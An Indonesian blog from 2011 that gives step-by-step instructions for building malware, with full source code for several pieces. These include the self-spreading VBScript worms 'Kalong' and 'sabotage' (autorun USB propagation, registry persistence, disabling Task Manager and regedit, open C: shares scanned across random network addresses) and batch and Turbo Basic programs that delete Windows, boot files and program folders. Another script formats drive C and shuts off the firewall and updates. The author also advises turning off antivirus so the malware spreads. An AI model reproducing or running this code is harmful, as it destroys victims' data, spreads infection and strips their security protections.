Virus

Virus

Kamis, 29 Desember 2011

Delete Program penting dalam Komputer Sekali Sentuh

Ini Bukan Virus... Tapi, banyak blogger-blogger menyebut ini virus...
Mungkin karena mereka asal mengcopy dan tidak mempelajarinya dulu...
Virus ini membutuhkan software Turbo Basic, jika anda tidak memiliki Software ini
Klik Here 

Langkah-langkah Pembuatan :
  • Buka Turbo Basic
  • Pilih Edit
  • Ketik (bukan copy-paste) kode dibawah ini :
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
  • Setelah itu Save tapi, jangan keluar dulu... buka option lalu ganti compile to Memory menjadi compile to EXE
  • Lalu Compile
  • Buka dimana folder installan Turbo Basic anda... karena disitulah program buatan anda terselesaikan...
Itulah Program Delete... Terima kasih!
Diposting oleh di Tidak ada komentar:
Label:

Virus Kalong

Virus ini cukup berbahaya... tapi, virus ini paling sering terdeteksi dengan antivirus apa saja...
Jadi tidak perlu khawatir...


Langkah-langkah Pembuatan :

  • Buka Notepad
  • Copy-paste atau anda rajin ketik kode dibawah ini :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next’//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(“WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
  • Setelah itu Save dengan extensi (*.vbs)
Itulah Virus kalong... Terima Kasih!
Diposting oleh di 1 komentar:
Label:

Virus Delete

Virus ini sangatlah berbahaya... tapi, virus ini paling sering ketahuan dengan virus luar negri...
Jadi jika ingin menyebarkan atau mencoba virus ini... carilah komputer yang mengguankan SMADAV saja... tapi, jika anda malas untuk mencari komputer yang hanya menggunakan SMADAV saja... cukup hanya anda Disable kan saja antivirus luar negrinya...
Jadi Berhati-hatilah...

Langkah-langkah pembuatan :
  • Buka Notepad
  • Copy-paste atau kalau anda rajin ketik saja kode dibawah ini :
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

  • Setelah itu Save dengan extensi (*.bat)
Itulah Virus Delete... Terima kasih!
Diposting oleh di Tidak ada komentar:
Label:

Virus Worm

Virus ini adalah virus yang suka menggandakan dirinya...
Virus ini sering menggandakan file-file anda tanpa anda ketahui...
Jadi Hati-hati...
Virus ini ada 2, jadi anda tinggal pilih mau Copy-paste yang mana...


Langkah-langkah Pembuatan :

  • Buka Notepad
  • Copy-paste atau kalau anda rajin ketik kode dibawah ini :



Worm 1



'54807463
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:", "s:")

If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe "
End if

Wshshell.Run("net share system=C:\ /unlimited"), 0, true

Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)

Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()

Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if

Wshshell.RegWrite "HKLM" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next

If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if

do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop

function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function

function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"

end function

function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function

function shareformat()
sharename = "\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0 
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function



Worm 2



on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunMS32DLL",winpath&"MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by xxxx Hack"
rg.regwrite "HKCRvbsfileDefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname

Save Dengan Ekstensi (*.vbs)
  • Setelah itu Save dengan extensi (*.vbs)
Itulah Virus Worm... Terima kasih!
Diposting oleh di Tidak ada komentar:
Label:

Virus Basic

Virus ini hanya virus biasa... mungkin hanya digunakan untuk pemula...
Tapi, sama aja effeknya kalau terinfeksi...
Jadi berhati-hatilah dalam pembuatan dan penyebaran...
Saya tidak menyarankan untuk mencobanya dikomputer sendiri dan menjahili teman anda...


Langkah-langkah Pembuatan :

  • Buka Notepad
  • Copy-paste atau kalau anda rajin ketik aja kode dibawah ini :
invisible command

@echo off
Swap mouse

rundll32 user,swapmousebutton
buka URL yg diinginkan

start http://www.google.com
Shutdown kmptr & beri pesan

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart

rundll32 mouse,disable
Disable keyboard stlh Restart

rundll32 keyboard,disable
Freezes kmptr stlh Restart

rundll32 user,disableoemlayer

  • Setelah itu Save dengan extensi (*.bat)
Itulah Virus Basic... Terima kasih!
Diposting oleh di Tidak ada komentar:
Label:

Virus Perusak

Virus ini dapat menghapus file dan folder penting dalam program Windows...
Jadi hati-hati dalam pembuatan dan penyebaran...
Saya tidak menyarankan untuk mencoba dikomputer sendiri ataupun menjahili teman anda...


Langkah-langkah pembuatan :

  • Buka Notepad
  • Copy-paste atau kalau anda rajin ketik aja kode dibawah ini :

copy ke Autorun

COPY %0 %windir%WINSTART.BAT
format drive C

format c: /q /autotest
delete Windows

DELTREE /Y %windir%
delete drive C dg paksa

DEL /F /S /Q C:
mematikan firewall & security center

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

  • Setelah itu Save dengan extensi (*.bat)

Itulah Virus perusak... Terima kasih!
Diposting oleh di Tidak ada komentar:
Label:
Langganan: Postingan (Atom)